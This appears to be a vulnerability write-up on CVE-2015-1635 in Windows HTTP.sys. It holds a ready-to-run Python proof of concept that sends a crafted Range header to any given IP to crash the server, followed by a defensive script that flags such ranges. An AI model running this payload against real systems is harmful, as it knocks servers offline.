CVE-2015-1635 identifies the latest vulnerability found in HTTP.sys of Microsoft's Windows operating system (OS). HTTP.sys, and therefore every application that relies on it, is susceptible to a Denial-of-Service (DoS) and potentially a remote code execution vulnerability triggered by an HTTP Range request.
The HTTP Range request lets a client fetch a specific byte offset within a file on the HTTP server. It is commonly used to resume failed or interrupted downloads: a user who has downloaded only half of a 1KB file can fetch the remainder by setting the Range header to '512-1024'.
To exploit the vulnerability, the attacker sends a specially crafted HTTP request carrying the header Range: bytes=18-18446744073709551615. The server then creates the kernel cache entry needed to accommodate the Range request. This causes the system to attempt to reach an unreachable address, which causes an integer overflow and blue-screens the victim's system.
```python
# Tested on Windows Server 2012 R2.
import socket
import sys

if len(sys.argv) <= 1:
    sys.exit('Give me an IP')

Host = sys.argv[1]  # target IP given on the command line


def SendPayload(Payload, Host):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((Host, 80))
    s.send(Payload.encode())  # encode so the script also runs under Python 3
    s.recv(1024)
    s.close()


# Make sure iisstart.htm exists.
Init = "GET /iisstart.htm HTTP/1.0\r\n\r\n"
Payload = "GET /iisstart.htm HTTP/1.1\r\nHost: blah\r\nRange: bytes=18-18446744073709551615\r\n\r\n"

SendPayload(Init, Host)
SendPayload(Payload, Host)
```
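A defender-side check for the Range pattern described above, added here as an example and not part of the original post: it parses the Range header of a raw HTTP request and flags byte ranges whose bounds are implausibly large or whose computed length would wrap a 64-bit counter. The sample requests, the 4 GiB offset threshold and the function names are constructed for this example.

```python
import re

UINT64_MAX = 2**64 - 1
MAX_PLAUSIBLE_OFFSET = 2**32  # assumption: offsets beyond 4 GiB are treated as suspicious

# Constructed sample requests (not captured traffic): a legitimate resume of a
# 1 KB file, the CVE-2015-1635 style range quoted in the text, and a multi-range
# request whose second range starts near the top of the 64-bit space.
SAMPLE_REQUESTS = [
    "GET /iisstart.htm HTTP/1.1\r\nHost: example\r\nRange: bytes=512-1024\r\n\r\n",
    "GET /iisstart.htm HTTP/1.1\r\nHost: blah\r\nRange: bytes=18-18446744073709551615\r\n\r\n",
    "GET /a.txt HTTP/1.1\r\nHost: example\r\nRange: bytes=0-99,18446744073709551600-\r\n\r\n",
]

RANGE_RE = re.compile(r"^Range:\s*bytes=(.+)$", re.IGNORECASE | re.MULTILINE)


def parse_byte_ranges(request):
    """Return (start, end) tuples from the Range header, or [] if there is none.
    Open-ended 'N-' and suffix '-N' forms carry None for the missing side."""
    m = RANGE_RE.search(request)
    if not m:
        return []
    ranges = []
    for spec in m.group(1).split(","):
        start, sep, end = spec.strip().partition("-")
        if not sep:
            continue  # not a byte-range-spec; ignore it
        ranges.append((int(start) if start else None, int(end) if end else None))
    return ranges


def is_suspicious_range(request):
    """True when a bound exceeds the plausible-offset threshold, the range is
    inverted, or end - start + 1 would not fit in an unsigned 64-bit length."""
    for start, end in parse_byte_ranges(request):
        if any(v is not None and v > MAX_PLAUSIBLE_OFFSET for v in (start, end)):
            return True
        if start is not None and end is not None:
            if end < start or end - start + 1 > UINT64_MAX:
                return True
    return False


def scan(requests):
    """Return the indices of requests whose Range header matches the attack pattern."""
    return [i for i, r in enumerate(requests) if is_suspicious_range(r)]
```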